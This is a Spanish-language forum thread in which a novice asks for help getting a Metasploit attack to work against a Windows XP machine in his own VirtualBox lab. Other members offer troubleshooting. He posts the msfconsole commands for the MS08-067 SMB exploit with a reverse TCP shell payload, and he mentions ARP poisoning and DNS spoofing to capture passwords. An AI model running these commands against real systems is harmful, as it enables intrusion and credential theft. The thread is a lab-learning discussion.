Metasploit

Iniciado por n3n3, 24 Enero 2014, 19:26 PM

0 Miembros y 2 Visitantes están viendo este tema.

n3n3

Hola muye buenas tardes. :D
Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender.

Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo.
lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:
:huh:
use exploit/windows/smb/ms08_067_netapi
set RHOST 000.000.000.000  <-----Ip a atacar
set payload windows/shell/reverse_tcp
set LHOST 000.000.000.000   <----Ip atacante
exploit

Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox


Ayudame por favor
*****************************************************************************
"Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos."

MCKSys Argentina

Una pregunta: el XP es vulnerable? Osea, está actualizado o no? Si está patcheado, no funcionará el exploit...  :P

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


n3n3

Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3
Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa
:-(
"Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos."

noopynoob

que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque

n3n3

Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
:-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:
"Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos."

noopynoob

Cita de: n3n3 en 24 Enero 2014, 19:55 PM
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
:-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:

pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono.

n3n3

Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.
"Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos."

engel lex

que maquina virtual usas? porque depende de ella puedes configurar las ip y todo eso para simular una red real :P
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

n3n3

Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb.


Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece.

Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema...
"Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos."

Owl-City

#9
Hola,

Amigo, te compadezco, no soy un profesional, no quiero ser necio, pero específicamente que exploit usaste, no me des el proceso solo el nombre, porque si es un payload, tienes que es pecificar.
Me explico:
Es de x86 o x64.
Se que usaste Cain y Abel, para hacer tus ataques de contraseña y envenenar la red. Y sí, es automático, por eso te dio en el blanco. Lo mejor que puedes hacer es programarte tu propio exploit en una terminal  ;)